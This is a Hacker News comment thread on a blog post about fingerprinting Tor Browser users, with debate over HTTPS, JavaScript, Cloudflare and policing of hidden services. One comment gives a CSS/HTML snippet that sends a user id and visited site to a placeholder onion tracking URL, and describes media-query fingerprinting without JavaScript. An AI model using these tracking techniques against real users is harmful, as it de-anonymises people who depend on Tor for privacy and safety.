
Exploiting the TOR-Browser - dsr_
http://www.hackerfactor.com/blog/index.php?/archives/761-Exploiting-the-TOR-Browser.html
======
apeace
> The things that makes TOR useful for people avoiding prosecution also makes
> it useful for people involved in malicious and criminal activities ...
> Everything from spam and network attacks to trafficking people and
> contraband.

> Although the Tor Project could promote options to restrict these malicious
> actions, they choose to do nothing. Seriously: if a TOR hidden service
> offers hard-core drugs or human trafficking or fake IDs, then they should be
> shut down.

I hope I can convince some folks here to be skeptical of this kind of
thinking.

Think about it: If the Tor project came up with some clever way to take down
bad hidden services, then what would be stopping a government from forcing
them to take down legitimate hidden services too? And meanwhile, the criminals
would move on to some other Tor-like service, and keep doing their thing.

In short, you're not going to stop criminals, who will always find a way to
keep doing what they're doing. You will, on the other hand, impede the free
speech of honest users.

The Tor project should focus on making it impossible for hidden services to be
taken down--even by the Tor project itself! And they do :)

~~~
mhuffman
> The things that makes TOR useful for people avoiding prosecution also makes
> it useful for people involved in malicious and criminal activities ...
> Everything from spam and network attacks to trafficking people and
> contraband.

It is ok if someone that doesn't understand it says those sorts of things, but
when an organization like cloudflare[1] jumps on the goof-troop bandwagon, it
really does make a difference.

[1] [https://blog.torproject.org/blog/trouble-
cloudflare](https://blog.torproject.org/blog/trouble-cloudflare)

~~~
apeace
I hope I can make you more skeptical of the "Cloudflare is the bad guy" trope.
Cloudflare is lightyears ahead of any CDN when it comes to supporting Tor.

They specifically built controls so that web sites can remove CAPTCHAs for Tor
users completely.[0]

They also do not block/CAPTCHA Tor users automatically. They treat Tor IPs
like any IPs: if they detect abuse from the IP, they start giving the CAPTCHA.

Finally, Cloudflare has stated publicly[1] that they have a desire to setup
.onion sites for their customers automatically. But they cannot do so until
the Tor project is able to upgrade the hashing algorithm used for .onion
addresses. If the two organizations could work together, this could be game-
changing for online anonymity. Imagine millions of web sites automatically
supporting Tor!

I can't understand why the HN crowd is so anti-Cloudflare. This Tor thing
seems to be one of the major misconceptions.

Disclaimer: I'm not affiliated with with either Tor or Cloudflare in any way.

[0] [https://support.cloudflare.com/hc/en-
us/articles/203306930-D...](https://support.cloudflare.com/hc/en-
us/articles/203306930-Does-CloudFlare-block-Tor-)

[1] [https://blog.cloudflare.com/the-trouble-with-
tor/](https://blog.cloudflare.com/the-trouble-with-tor/)

~~~
mhuffman
My link was a direct response to your second link.

I do not believe cloudflare on your first link (that they treat tor ips like
any ips).

I can tell you from experience that I have never connected to a cloudflare
backed site with tor that didn't require multiple captchas. So every tor ip is
hostile to cloudflare sites? If so, how is that practically different than
just blocking tor?

I think that if you read the response at your first link again, you can see
that they are implying what you are saying, but that are not saying what you
are saying. I think they are blocking tor, but explaining it in a diplomatic
way.

~~~
Trundle
>So every tor ip is hostile to cloudflare sites?

OP blog post claims 96% of the traffic going to their tor hidden service is
hostile. It doesn't seem unreasonable to me at all that every tor ip is
hostile.

~~~
mhuffman
It is their definition of "hostile" that is the problem. They do not explain.
I suspect it means "I can't track you, so you are hostile." Otherwise, where
is the data for this?

------
CiPHPerCoder
> In my experience, HTTPS makes you more distinct and trackable than plain
> HTTP.

You lost me here.

[https://www.wired.com/2017/01/half-web-now-encrypted-
makes-e...](https://www.wired.com/2017/01/half-web-now-encrypted-makes-
everyone-safer/)

~~~
apeace
The author is correct. HTTPS adds more vectors which can be used to form a
fingerprint, such as the TLS version or the preferred cipher suites of the
browser.

For example: [https://www.ssllabs.com/projects/client-
fingerprinting/](https://www.ssllabs.com/projects/client-fingerprinting/)

Anecdotally, I can tell you I have heard of ad tracking companies actively
using this (for years now).

~~~
acdha
That's what you use when you don't have the richer information offered by HTTP
sniffing.

TLS versions tell you someone is one of a billion users of iOS version X; with
HTTP they can piece together session cookies across every site and service you
use, or with active attacks use things like the Verizon injected tracking code
uniquely identifying you across devices.

~~~
apeace
That's true. If you're talking about your ISP sniffing your traffic, HTTPS is
a win. But since the author was talking about using Tor, I figured he was
focusing on fingerprinting by the websites themselves, where HTTPS is easier
for them to fingerprint than HTTP.

~~~
acdha
> fingerprinting by the websites themselves, where HTTPS is easier for them to
> fingerprint than HTTP.

Could you explain your reasoning on that? If they're using the Tor browser
every user is going to be very similar on crypto suites, user-agent, etc. —
it's a rebadged Firefox distributable so it's going to be using their HTTPS
implementation and you won't even get the OS version variations unless someone
at the Tor project massively screws up.

The bigger problem is that if you are being targeted by the website, there are
far more interesting attacks they can try – convince the user to turn on
JavaScript and do all of that profiling for WebGL/canvas rendering, local
fonts, network resource timing to look for cached content from other sites,
etc.

~~~
apeace
Yes, great point. But I said _easier_, not _easy_. Using HTTPS, a user may
have a more outdated version of the Tor browser with different cipher suites
than everyone else. Using plain HTTP, that can't happen.

> unless someone at the Tor project massively screws up

And that is what the author of the article is claiming.

My comments here aren't in agreement with the author of the article, and I'm
not claiming "HTTPS is bad" or anything like that. It's simply a categorical
fact that HTTPS has more vectors to be fingerprinted than HTTP.

But of course, as you mentioned, features enabled by Javascript are the bigger
problem, which is why users who wish to be anonymous should completely disable
it!

~~~
acdha
Adding HTTPS plausibly adds a single low-cardinality signal but it removes a
ton of other ones for network-level observers. When it comes to hostile site
owners, realistically you're screwed but from a privacy perspective it's a
question of whether you're one of the small percentage of users who have a)
failed to install updates and b) disabled JavaScript.

That's a pretty small percentage of users for whom HTTPS isn't an across-the-
board win for privacy.

------
wyager
> Seriously: if a TOR hidden service offers hard-core drugs or human
> trafficking or fake IDs, then they should be shut down.

If it were possible to do this, TOR would lose any shred of value it has for
people using it to fight oppression.

Ok, let's say we put technology in place to "shut down" sites that sell fake
IDs to teenagers (god forbid!).

Well now, Mr. Lawman from the U.K. or China is going to come in and say "hey,
wait a minute, you can shut down websites that illegally peddle fake IDs, so
you obviously have the ability to shut down websites that peddle illegal
extremism (meaning falun gong, anti-government groups, etc.)." The _only_
defense against the TOR project and its supporters being forced to do this is
that it's not technically feasible.

It's _really bad_ that this isn't manifestly obvious to someone who is
apparently involved with the TOR project to a substantial degree.

~~~
mschuster91
> If it were possible to do this, TOR would lose any shred of value it has for
> people using it to fight oppression.

Most people in that field mess up their opsec sufficiently often that this is
very well possible, see SilkRoad and its successors.

When it comes to the kiddyfuckers, I'm a bit torn myself when I ask myself if
child pornography (and apparently people even shared videos of raped
_toddlers_ ) is an excuse for hacking and exposing actually innocent TOR
users. It's the classic 4chan/reddit dilemma: what kind of content justifies
which measures, and when is it worth to limit the right to free speech?

For the record, I support anything done to bring child porn offenders to
justice, but I also recognize that this opens dangerous doors - from the issue
of "now it's an excuse for the Chinese/Russians/Iran/Saudi-Arabians to crack
down on legitimate activities" to "people are actually already planting fake
child-porn evidence, including in scareware/ransomware".

~~~
Izmaki
The thing is, a person wearing a mask is only hidden in a crowd, if the crowd
of people wearing masks exist in the first place.

By removing all evil from tor, you expose the good, leaving it vulnerable.
That defeats the purpose, I suppose.

~~~
mschuster91
Yeah, certainly removing child porn from TOR reduces the amount of background
noise in traffic. But there should still be vast quantities of people using
TOR for file-sharing to provide significant noise...

~~~
Izmaki
Why target one illegal activity and not the other? It would serve no purpose
to allow some crimes to take place, but not others. I believe that organizing
drug sales, small amounts as well as large, is just as horrible and can ruin
just as many lives as distributing images and videos (I wonder how many are
duplicates) of exploited children.

~~~
mschuster91
Because it's usually the drug consumer him/herself who decides what to buy and
consume - and given that most of the drug sellers apparently don't cut their
products with weird stuff from rat dung to lead, fentanyl or other stuff that
sometimes causes dozens of ODs (fentanyl-contaminated heroin batches are well
known for this, and a plague for ERs because the victims always come in a
bunch) one might argue that clean, vetted drugs via TOR/Silk Road are better
for society than if the users would hit the streets. Also, drugs bought on the
streets directly finance the street mafia and contribute to gang violence, as
well as negative reputation for the "dealer city quarters". Internet drug
shopping kills off this part of the chain totally.

Child porn is just ... inexcusable no matter how you think about it. Fine, if
some porn stars make themselves look young, okay, but that's consenting adult
performers. Abusing Toddlers and children for porn is not just violent in
itself, it literally creates wrecks.

~~~
Izmaki
You cannot defend one type of crime, because another type is much worse. If
possible, one could argue that child pornography is less horrible than hitman
services and human trafficking, given that the majority of the content shared
is not new content of new victims.

Let's not try to justify serious crime, because other crime may be seen as
more serious.

~~~
mschuster91
The point is that child pornography (and also sexual abuse of children) is
viewed as evil across all societies and groups.

Human trafficking, drugs and hitmen services, however, are not - the most
notable exception being the various kinds of mafia or other organized crime.

------
irl_
Browser fingerprinting is not new.

See also: [https://panopticlick.eff.org/](https://panopticlick.eff.org/)

"Panopticlick will analyze how well your browser and add-ons protect you
against online tracking techniques. We’ll also see if your system is uniquely
configured—and thus identifiable—even if you are using privacy-protective
software."

Tor bug #6119
([https://trac.torproject.org/projects/tor/ticket/6119](https://trac.torproject.org/projects/tor/ticket/6119))
talking about using this tool specifically for Tor browser. There are also
continuous efforts in Tor Browser to remove fingerprintability (e.g. #22127 -
[https://trac.torproject.org/projects/tor/ticket/22127](https://trac.torproject.org/projects/tor/ticket/22127)).

------
mirimir
The title is clickbait. There are no exploits involved. He's not dropping NITs
on users, for example. Fingerprinting is not a huge issue. The main defense is
preventing adversaries from learning one's ISP-assigned IP address. Maybe Tor
Project does encourage too much confidence in the "all users look alike"
feature. They certainly do, in my opinion, regarding the security of Tor
browser in Windows, with no protection against exploits and Tor bypass.

------
FiloSottile
This is little more than an opinion piece. AFAICT, the only "vulnerability" is
that with JS on, it can detect the Operating System.

At some point it claims it can also detect screen size

> However, there are not too many people using the same OS and same screen
> size and visiting the same sites at around the same time. You will likely
> stand out.

but both my tests and themselves contradict that:

> On a normal desktop browser, the Window Size is smaller than the Screen
> Size. (Mobile devices may show a Windows Size that is larger than the Screen
> Size.) To prevent screen profiling, the TOR-Browser sets them to be the same
> size.

Note that _detecting_ Tor Browser is doable from the User-Agent, so there's no
point in setting Window Size = Screen Size.

Definitely not "exploiting", and I suspect that's why it couldn't get a reply
from security MLs, which see a lot of these. Flagged.

------
throwaway322242
A number of people may consider drug markets as fighting oppression. [1] Ross
Ulbritch certainly did. Law and morality evolves.

[1] Psychedelics and cognitive liberty: Reimagining drug policy through the
prism of human rights

------
sanbor
Let's say X event happens and Tor shuts down. What will happen with all that
horrible people using the Tor network? Will they stop doing horrible
activities? Probably not. Maybe they'll have more difficulties in their
activities since they'll be geographically isolated.

Tor it's just a channel that horrible people uses, but the horrible stuff that
they do happens in real life.

There is one approach that for sure it's going to solve the horrible
activities that people do. Put a camera in every house. Put a camera in every
corner. Then you can monitor every person and check if they're doing horrible
things.

Would be worth to live in a world like that?

~~~
angry-hacker
Do you also think the same say about gun control? Hate speech?

------
SadWebDeveloper
A little condescending and obnoxious for my taste but mostly everything here
is well-known and while the TOR-Browser devs could implement everything this
guy wants it, and it will end in a moral dilemma of what could be considerable
"malicious". IMHO the Tor Browser is not suitable for the truly paranoid but
usually this wont matter because the truly paranoid is not using the TOR
network as-is (with the integrated browser) and those who aren't truly
paranoid can live with those risk.

~~~
symlinkk
what are the truly paranoid using?

~~~
__s
[https://stallman.org/stallman-computing.html](https://stallman.org/stallman-
computing.html)

~~~
linkregister
So IceCat over Tor. Actually pretty sensible.

------
nom
All in all not a really in-depth article, but the author has some valid
points. All parameters exposed by the browser should be variated, especially
the scroll bar size which seems to be the real offender here.

Not sure how the Tails [0] distribution handles it, but IIRC it notified me of
the screen size / view port size problem as I maximize the browser.

0: [https://tails.boum.org/](https://tails.boum.org/)

~~~
SadWebDeveloper
Just disable JS by default and it will be good for 99.99% of the cases you
don't allow explicitly allow it.

~~~
mschuster91
You can still target for the screen size using CSS - you can even track
_changes_ by creating a css file with literally thousands of thousands of
media queries, where each media query sets e.g. the background-image property
of a hidden div.

Thanks to gzip compression, this shouldn't even take much data to transfer.

Oh, and as I think of it, would this here still work?

    
    
        <a href="http://reddit.com"><span class="tracker" /></a>
        a#mylink span.tracker { background-image: url(http://myservice.onion/track.php?uid=xxx&trackedsite=reddit.com); }

~~~
SadWebDeveloper
Of course but that will require to also accommodate for the fact that after N
queries the circuit/endpoints changes and unless you have a unique tracking
system per every "attacked" user (like an random generated ID per CSS served)
or a way to store persistent across sessions, Screen Size alone won't be able
to identify everyone on the TOR network, and that's my point if you disable JS
(raise the security level to the max for the case of the tor browser) you will
be good for the most common attacks for "APT's" you pretty much don't stand a
chance unless you go "outside the grid" aka don't use the integrated browser.

~~~
mschuster91
You have _lots_ of signals to generate without JS. System font base (this
alone should provide a fairly unique identifier!), screen aspect ratio, DPI
value, "pointer" media query, the relationship between width/device-width...
and on non-TOR-scenarios you can fingerprint supported HTTPS encryption layers
plus the user-agent. Oh, and you can also passively fingerprint on the
presence of an ad blocker.

~~~
SadWebDeveloper
If you can identify _a single person_ on the TOR network with the TOR Browser,
across several sessions, just with the data you are describing and without
false positives, it will probably make a case but those attacks are well-know
since 2k8 and so far no one has made the same claims you firmly believe, so
unless you know something that no-one in the world, then for the common "TOR
user", those who use the integrated TOR Browser are in good standing just by
disabling JS alone. If you are THAT paranoid, you should already know that you
shouldn't use the integrated browser itself, since you are loosing half the
battle just there by giving your adversaries a well-known attack vector.

------
janwillemb
> Since this exploit is one of the minor ones, I've decided to not try to sell
> it.

He would try and sell larger vulnerabilities? It only proves the point, but I
still consider this a little bit disturbing.

------
tptacek
Don't use Tor Browser. It's probably the least safe browser on the Internet.

[https://news.ycombinator.com/item?id=13623735](https://news.ycombinator.com/item?id=13623735)

(For people unfamiliar: Tor and Tor Browser are not the same thing!)

~~~
pdexter
What to use instead?

~~~
tptacek
Literally any other mainstream browser.

~~~
middleclick
Hardly good advice. Tor Browser is specifically built with privacy and
security in mind. Using any "mainstream browser" and then expecting to do all
those tweaks is not practical advice nor feasible.

~~~
tptacek
Read the link upthread. I didn't explain the argument here because it's
explained in depth there. Never, ever use Tor Browser.

------
travbrack
So, make a browser extension that gives you a different fingerprint every time
you use it.

------
smoyer
I have a habit of browsing with random window sizes (usually shrunk to just
fit what I want to see. I guess if I ever need to use the TOR browser, I'll
need to get out of that habit! This researcher disclosed his simplest approach
to fingerprinting TOR browsers but if he really has 12 factors, you'll only be
safe browsing sites with huge amounts of traffic.

------
eeZah7Ux
Complaints do not help. Contributions and donations do.

Tor is spelled Tor, not TOR.

~~~
linkregister
TOR is the legacy name, an acronym for The Onion Router. The modern spelling
is preferred, but it isn't incorrect to call the project TOR.

[https://en.wikipedia.org/wiki/Tor_(anonymity_network)](https://en.wikipedia.org/wiki/Tor_\(anonymity_network\))

~~~
mirimir
Well, Paul Syverson says that it's Tor, not TOR, and has never been an
acronym.

[https://www.acsac.org/2011/program/keynotes/syverson.pdf](https://www.acsac.org/2011/program/keynotes/syverson.pdf)

~~~
Dylan16807
> He would respond that it was _the_ onion routing, the original program of
> projects from NRL. It was Rachel Greenstadt who noted to him that this was a
> nice acronym and gave Tor its name. Roger then observed that it also works
> well as a recursive acronym, ‘Tor’s onion routing’. It was also his decision
> that it should be written ‘Tor’ not ‘TOR’. Making it more of an ordinary
> word in this way also emphasizes the overlap of meaning with the German word
> ‘Tor’, which is gate (as in a city gate). To sum up, “Tor: The Second-
> Generation Onion Router” is about the design of onion-routing systems, not
> just onion routers themselves. Tor is the third generation of onion rout-
> ing, not the second. And the ‘r’ in ‘Tor’ represents ‘routing’ not ‘router’.
> In hindsight we probably should have spent a bit more time on the paper
> title.

You have a significantly different definition of "not an acronym" than I do.

~~~
mirimir
Sorry, I misspoke. It's not an acronym for "the onion router", but rather for
"the onion routing".

------
theprop
You may prefer the Epic Privacy Browser.

